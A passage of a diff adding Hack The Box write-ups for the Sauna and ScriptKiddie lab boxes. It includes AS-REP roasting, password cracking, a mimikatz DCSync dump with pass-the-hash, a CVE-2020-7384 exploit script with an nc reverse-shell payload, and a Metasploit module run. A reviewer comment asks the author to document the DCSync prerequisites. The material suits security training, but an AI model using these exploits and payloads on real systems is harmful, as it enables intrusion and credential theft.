+ Discovered open port 53/tcp on 10.10.10.175
+ Discovered open port 636/tcp on 10.10.10.175
+ Discovered open port 5985/tcp on 10.10.10.175
+ Discovered open port 88/tcp on 10.10.10.175
+ Discovered open port 49667/tcp on 10.10.10.175
+ Discovered open port 49673/tcp on 10.10.10.175
+ Discovered open port 80/tcp on 10.10.10.175
+ Discovered open port 3268/tcp on 10.10.10.175
+ Discovered open port 55898/tcp on 10.10.10.175
+ Discovered open port 464/tcp on 10.10.10.175
+ Discovered open port 49675/tcp on 10.10.10.175
+ Discovered open port 49686/tcp on 10.10.10.175
+ Discovered open port 389/tcp on 10.10.10.175
+ Discovered open port 593/tcp on 10.10.10.175
+ Discovered open port 9389/tcp on 10.10.10.175
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → nmap -sCV -p 53,135,139,389,445,636,3268,5985,464,593 10.10.10.175
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 09:39 CEST
+ Nmap scan report for 10.10.10.175
+ Host is up (0.029s latency).
+
+ PORT STATE SERVICE VERSION
+ 53/tcp open domain Simple DNS Plus
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
+ 445/tcp open microsoft-ds?
+ 464/tcp open kpasswd5?
+ 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+ 636/tcp open tcpwrapped
+ 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
+ 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-server-header: Microsoft-HTTPAPI/2.0
+ |_http-title: Not Found
+ Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: 7h07m50s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled and required
+ | smb2-time:
+ | date: 2021-06-08T14:47:18
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 48.80 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+It's basically a bank website, and going to the **About Us** page we see a list of potential usernames:
+
+
+
+So let's save the usernames in a textfile:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → vim users.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → cat users.txt
+ FergusSmith
+ ShaunCoins
+ BowieTaylor
+ SophieDriver
+ HugoBear
+ StevenKerb
+
+ fsmith
+ skerb
+ hbear
+ sdriver
+ btaylor
+ scoins
+
+ fergus.smith
+ shaun.coins
+ bowie.taylor
+ hugo.bear
+ steven.kerb
+ sophie.driver
+
+ fergus_smith
+ shaun_coins
+ bowie_taylor
+ hugo_bear
+ steven_kerb
+ sophie_driver
+
+
+
+Now our nmap scan picked up the port 389 so let's enumerate it further:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → nmap -n -sV --script "ldap*" -p 389 10.10.10.175
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 09:41 CEST
+ Nmap scan report for 10.10.10.175
+ Host is up (0.030s latency).
+
+ PORT STATE SERVICE VERSION
+ 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
+ | ldap-brute:
+ | root:empty> => Valid credentials
+ | admin:empty> => Valid credentials
+ | administrator:empty> => Valid credentials
+ | webadmin:empty> => Valid credentials
+ | sysadmin:empty> => Valid credentials
+ | netadmin:empty> => Valid credentials
+ | guest:empty> => Valid credentials
+ | user:empty> => Valid credentials
+ | web:empty> => Valid credentials
+ |_ test:empty> => Valid credentials
+
+ [...]
+
+ | msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | msDS-NcType: 0
+ | msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE
+ | dc: EGOTISTICAL-BANK
+ | dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
+ | dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
+ |_ dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
+ Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+
+
+Just like we saw earlier, we see that the DC name is **EGOTISTICAL-BANK.LOCAL** so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.175 egotistical-bank.local' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping -c1 egotistical-bank.local
+ PING egotistical-bank.local (10.10.10.175) 56(84) bytes of data.
+ 64 bytes from egotistical-bank.local (10.10.10.175): icmp_seq=1 ttl=127 time=27.7 ms
+
+ --- egotistical-bank.local ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 27.650/27.650/27.650/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ →
+
+
+
+Now let's use GetNPusers.py to get the TGT (Ticket Granting Ticket) if the account doesn't need Kerberos pre-authentication, just like we did back on the [Forest](38.html) box.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → locate GetNPUsers.py
+ /home/nothing/HTB/Forest/GetNPUsers.py
+ /home/nothing/HTB/Forest/impacket/build/scripts-3.9/GetNPUsers.py
+ /home/nothing/HTB/Forest/impacket/examples/GetNPUsers.py
+ /usr/local/bin/GetNPUsers.py
+ /usr/local/lib/python3.9/dist-packages/impacket-0.9.23.dev1+20210519.170900.2f5c2476-py3.9.egg/EGG-INFO/scripts/GetNPUsers.py
+ /usr/share/doc/python3-impacket/examples/GetNPUsers.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → **python3** /home/nothing/HTB/Forest/impacket/build/scripts-3.9/**GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -usersfile users.txt -format john -outputfile output.txt**
+ Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
+
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] invalid principal syntax
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] invalid principal syntax
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] invalid principal syntax
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → cat output.txt
+ $krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:e5fd4e219aaaeaaee831332f9757141c$4b7dc2211c0031d41c8667e233453527d9b0dd39176a4fcc15bbb9d7535e360a47f4c7f30e46e1afbf6ce3d27fca4f9c565dd47aa5896389bcd9a70e74ceb7ead43f5bc37be009d480bd404547ee634a22f161d599913a834ead66f05421ae2c5f550fb3334490cafebd10186b90a5343f5240cf901a033f0b3126c45e4e27f0f4514bf5367fc281e5bc826921b136ed7b995f9c1144f9a62f8d871806e3bbb07a3789bcedfa928409ac543b4ab30f024730b1d9ca818ceb99e6dfd064544eec1a530075004840b580afcfa3787a7c1c9012957d7c0b5ae53af8e845173509688166cbe140017a3b2076d583b1d496e42ef78b9e305edf5b43802c653ef6ab4d
+
+
+
+Now that we got fsmith's hashed password let's crack it with john:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → john output.txt -w=/usr/share/wordlists/rockyou.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ **Thestrokes23 ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)**
+ 1g 0:00:00:09 DONE (2021-06-08 09:54) 0.1102g/s 1161Kp/s 1161Kc/s 1161KC/s Thrall..Thehunter22
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+And we got fsmith's password! Now let's use evil-winrm to get onto the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → evil-winrm -u fsmith -p Thestrokes23 -i egotistical-bank.local
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
+ *Evil-WinRM* PS C:\Users\FSmith> ls
+
+
+ Directory: C:\Users\FSmith
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 1/23/2020 10:01 AM Desktop
+ d-r--- 1/24/2020 10:40 AM Documents
+ d-r--- 9/15/2018 12:19 AM Downloads
+ d-r--- 9/15/2018 12:19 AM Favorites
+ d-r--- 9/15/2018 12:19 AM Links
+ d-r--- 9/15/2018 12:19 AM Music
+ d-r--- 9/15/2018 12:19 AM Pictures
+ d----- 9/15/2018 12:19 AM Saved Games
+ d-r--- 9/15/2018 12:19 AM Videos
+
+
+ *Evil-WinRM* PS C:\Users\FSmith> cd Desktop
+ *Evil-WinRM* PS C:\Users\FSmith\Desktop> ls
+
+
+ Directory: C:\Users\FSmith\Desktop
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 1/23/2020 10:03 AM 34 user.txt
+
+
+ *Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
+ 1bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc let's use Invoke-winPEAS.ps1 from powershell empire:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Sauna]
+ → locate winPEAS.ps1
+ /home/nothing/HTB/Buff/Invoke-winPEAS.ps1
+ /home/nothing/HTB/Omni/SirepRAT/Invoke-winPEAS.ps1
+ /usr/share/powershell-empire/data/module_source/privesc/Invoke-winPEAS.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Sauna]
+ → cp /usr/share/powershell-empire/data/module_source/privesc/Invoke-winPEAS.ps1 .
+
+
+
+let's upload it to a temporary directory we create:
+
+
+ *Evil-WinRM* PS C:\Users\FSmith\Desktop> mkdir C:\Temp
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 6/8/2021 8:06 AM Temp
+
+
+ *Evil-WinRM* PS C:\Users\FSmith\Desktop> cd C:\Temp
+ *Evil-WinRM* PS C:\Temp>
+
+
+
+Then we can use evil-winrm's built in upload function:
+
+
+ *Evil-WinRM* PS C:\Temp> upload Invoke-winPEAS.ps1
+ Info: Uploading Invoke-winPEAS.ps1 to C:\Temp\Invoke-winPEAS.ps1
+
+
+ Data: 310740 bytes of 310740 bytes copied
+
+ Info: Upload successful!
+
+ *Evil-WinRM* PS C:\Temp> ls
+
+
+ Directory: C:\Temp
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 6/8/2021 8:07 AM 233056 Invoke-winPEAS.ps1
+
+
+
+Then just import the .ps1 file as a module then run the command:
+
+
+ *Evil-WinRM* PS C:\Temp> import-module ./Invoke-winPEAS.ps1
+ *Evil-WinRM* PS C:\Temp> Invoke-winPEAS
+
+
+
+` 
+
+Scrolling through the winPEAS output we see the following:
+
+
+
+So now we have svc_loanmgr's password, so let's spawn another evil-winrm session with his credentials:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → evil-winrm -u svc_loanmgr -p Moneymakestheworldgoround! -i egotistical-bank.local
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
+ egotisticalbank\svc_loanmgr
+
+
+
+As expected we managed to spawn a session as svc_loanmgr, now in order to privesc we're going to upload mimikatz
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Sauna]
+ → locate mimikatz.exe
+ /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe
+ /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
+
+
+ [term2]
+
+ *Evil-WinRM* PS C:\Users\svc_loanmgr> cd C:\Temp
+ *Evil-WinRM* PS C:\Temp> upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
+ Info: Uploading /usr/share/windows-resources/mimikatz/x64/mimikatz.exe to C:\Temp\mimikatz.exe
+
+
+ Data: 1773544 bytes of 1773544 bytes copied
+
+ Info: Upload successful!
+
+
+
+Now let's run it:
+
+
+ *Evil-WinRM* PS C:\Temp> .\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
+
+ .#####. mimikatz 2.2.0 (x64) #19041 May 31 2021 00:08:47
+ .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
+ ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
+ ## \ / ## > https://blog.gentilkiwi.com/mimikatz
+ '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
+ '#####' > https://pingcastle.com / https://mysmartlogon.com ***/
+
+ mimikatz(commandline) # lsadump::dcsync /user:Administrator
+ [DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain
+ [DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
+ [DC] 'Administrator' will be the user account
+ [rpc] Service : ldap
+ [rpc] AuthnSvc : GSS_NEGOTIATE (9)
+
+ Object RDN : Administrator
+
+ ** SAM ACCOUNT **
+
+ SAM Username : Administrator
+ Account Type : 30000000 ( USER_OBJECT )
+ User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
+ Account expiration :
+ Password last change : 1/24/2020 10:14:15 AM
+ Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
+ Object Relative ID : 500
+
+ Credentials:
+ **Hash NTLM: d9485863c1e9e05851aa40cbb4ab9dff**
+ ntlm- 0: d9485863c1e9e05851aa40cbb4ab9dff
+ ntlm- 1: 7facdc498ed1680c4fd1448319a8c04f
+ lm - 0: ee8c50e6bc332970a8e8a632488f5211
+
+ Supplemental Credentials:
+ * Primary:NTLM-Strong-NTOWF *
+ Random Value : caab2b641b39e342e0bdfcd150b1683e
+
+ * Primary:Kerberos-Newer-Keys *
+ Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
+ Default Iterations : 4096
+ Credentials
+ aes256_hmac (4096) : 987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
+ aes128_hmac (4096) : 145e4d0e4a6600b7ec0ece74997651d0
+ des_cbc_md5 (4096) : 19d5f15d689b1ce5
+ OldCredentials
+ aes256_hmac (4096) : 9637f48fa06f6eea485d26cd297076c5507877df32e4a47497f360106b3c95ef
+ aes128_hmac (4096) : 52c02b864f61f427d6ed0b22639849df
+ des_cbc_md5 (4096) : d9379d13f7c15d1c
+
+ * Primary:Kerberos *
+ Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
+ Credentials
+ des_cbc_md5 : 19d5f15d689b1ce5
+ OldCredentials
+ des_cbc_md5 : d9379d13f7c15d1c
+
+ * Packages *
+ NTLM-Strong-NTOWF
+
+ * Primary:WDigest *
+ 01 3fbea1ff422da035f1dc9b0ce45e84ea
+ 02 708091daa9db25abbd1d94246e4257e2
+ 03 417f2e40d5be8d436af749ed9fddb0b0
+ 04 3fbea1ff422da035f1dc9b0ce45e84ea
+ 05 50cb7cfb64edf83218804d934e30d431
+ 06 781dbcf7b8f9079382a1948f26f561ee
+ 07 4052111530264023a7d445957f5146e6
+ 08 8f4bffc5d94cc294272cd0c836e15c47
+ 09 0c81bc892ea87f7dd0f4a3a05b51f158
+ 10 f8c10a5bd37ea2568976d47ef12e55b9
+ 11 8f4bffc5d94cc294272cd0c836e15c47
+ 12 023b04503e3eef421de2fcaf8ba1297d
+ 13 613839caf0cf709da25991e2e5cb63cf
+ 14 16974c015c9905fb27e55a52dc14dfb0
+ 15 3c8af7ccd5e9bd131849990d6f18954b
+ 16 2b26fb63dcbf03fe68b67cdd2c72b6e6
+ 17 6eeda5f64e4adef4c299717eafbd2850
+ 18 3b32ec94978feeac76ba92b312114e2c
+ 19 b25058bc1ebfcac10605d39f65bff67f
+ 20 89e75cc6957728117eb1192e739e5235
+ 21 7e6d891c956f186006f07f15719a8a4e
+ 22 a2cada693715ecc5725a235d3439e6a2
+ 23 79e1db34d98ccd050b493138a3591683
+ 24 1f29ace4f232ebce1a60a48a45593205
+ 25 9233c8df5a28ee96900cc8b59a731923
+ 26 08c02557056f293aab47eccf1186c100
+ 27 695caa49e68da1ae78c1523b3442e230
+ 28 57d7b68bd2f06eae3ba10ca342e62a78
+ 29 3f14bb208435674e6a1cb8a957478c18
+
+
+ mimikatz(commandline) # exit
+ Bye!
+
+
+And we got the NTLM Hash! Let's use it to login as the Administrator user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Sauna]
+ → evil-winrm -u Administrator -H "d9485863c1e9e05851aa40cbb4ab9dff" -i egotistical-bank.local
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
+ egotisticalbank\administrator
+ *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
+ *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
+ f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get an Administrator evil-winrm session and got the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
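Review bot: the escalation from svc_loanmgr to Administrator (the `.\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"` call under "Now let's run it:") never says why that account is allowed to replicate directory data; DCSync only succeeds for principals holding the replication rights on the domain object, and as written the reader cannot tell whether that was verified or guessed. Add a line before the mimikatz call that shows the check (the ACL on the domain object, or the corresponding BloodHound edge) or at least states that svc_loanmgr was found to hold those rights. A related gap: "Scrolling through the winPEAS output we see the following:" is followed by nothing in this hunk, so the origin of the password used in `evil-winrm -u svc_loanmgr -p Moneymakestheworldgoround! -i egotistical-bank.local` is untraceable; put the winPEAS finding in text rather than only in an image. The same applies to the empty "Here we can see the progress graph :" under Conclusion.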
diff --git a/Easy/58.md b/Easy/58.md
new file mode 100644
index 0000000..4f2f639
--- /dev/null
+++ b/Easy/58.md
@@ -0,0 +1,396 @@
+# ScriptKiddie Writeup
+
+
+
+## Introduction :
+
+ScriptKiddie is an easy box released back in Febuary 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → nmap -vvv -p- 10.10.10.226 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.226
+ Discovered open port 5000/tcp on 10.10.10.226
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
+ | 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
+ |_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
+ 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
+ |_http-title: k1d'5 h4ck3r t00l5
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 5000 so let's investigate it:
+
+
+
+There were alot of rabbitholes for this box early on, so here's the intended way:
+
+
+
+Basically here you see that you are able to upload an android template file, and there is an exploit for it called [CVE2020-7384](https://www.exploit-db.com/exploits/49491):
+
+
+
+So let's save it locally:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → vim exploit.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → cat exploit.py
+ #!/usr/bin/env python3
+ import subprocess
+ import tempfile
+ import os
+ from base64 import b64encode
+
+ # Change me
+ **payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2> &1|nc 10.10.14.13 9001 >/tmp/f'**
+
+ # b64encode to avoid badchars (keytool is picky)
+ payload_b64 = b64encode(payload.encode()).decode()
+ dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
+
+ print(f"[+] Manufacturing evil apkfile")
+ print(f"Payload: {payload}")
+ print(f"-dname: {dname}")
+ print()
+
+ tmpdir = tempfile.mkdtemp()
+ apk_file = os.path.join(tmpdir, "evil.apk")
+ empty_file = os.path.join(tmpdir, "empty")
+ keystore_file = os.path.join(tmpdir, "signing.keystore")
+ storepass = keypass = "password"
+ key_alias = "signing.key"
+
+ # Touch empty_file
+ open(empty_file, "w").close()
+
+ # Create apk_file
+ subprocess.check_call(["zip", "-j", apk_file, empty_file])
+
+ # Generate signing key with malicious -dname
+ subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
+ "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])
+
+ # Sign APK using our malicious dname
+ subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
+ "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])
+
+ print()
+ print(f"[+] Done! apkfile is at {apk_file}")
+ print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
+
+
+
+You can use this or we can just use metasploit:
+
+
+ msf6 > search venom apk
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection 2020-10-29 excellent No Rapid7 Metasploit Framework msfvenom APK Template Command Injection
+
+
+ Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
+
+ msf6 > use 0
+ [*] No payload configured, defaulting to cmd/unix/reverse_netcat
+ msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options
+
+ Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ FILENAME msf.apk yes The APK file name
+
+
+ Payload options (cmd/unix/reverse_netcat):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST 10.0.0.10 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+ **DisablePayloadHandler: True (no handler will be created!)**
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+
+
+
+Let's setup the required options and generate the apk template:
+
+
+ msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST tun0
+ LHOST => tun0
+ msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 9002
+ LPORT => 9002
+ msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
+
+ [+] msf.apk stored at /home/nothing/.msf4/local/msf.apk
+ msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
+ → cp /home/nothing/.msf4/local/msf.apk .
+
+
+
+Now let's prepare our netcat to catch the reverse shell on our port 9002, and upload the apk file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+
+
+
+` 
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.226] 36670
+ id
+ uid=1000(kid) gid=1000(kid) groups=1000(kid)
+
+ cat ~/user.txt
+ 1dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there you go! We have a reverse shell as the kid user, and thus we have been able to print the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now before we enumerate the box let's get a fully interactive TTY shell:
+
+
+ which python python3 wget curl
+ /usr/bin/python3
+ /usr/bin/wget
+ /usr/bin/curl
+
+ #spawn a TTY with python3
+
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+
+
+ #background the reverse shell process
+
+ kid@scriptkiddie:~/html$ ^Z
+ [1] + 3083589 suspended nc -lvnp 9002
+
+
+ #set stty raw and foreground the process
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
+ → stty raw -echo ; fg
+ [1] + 3083589 continued nc -lvnp 9002
+
+ #export the SHELL and TERM variables
+
+ kid@scriptkiddie:~/html$ export SHELL=bash
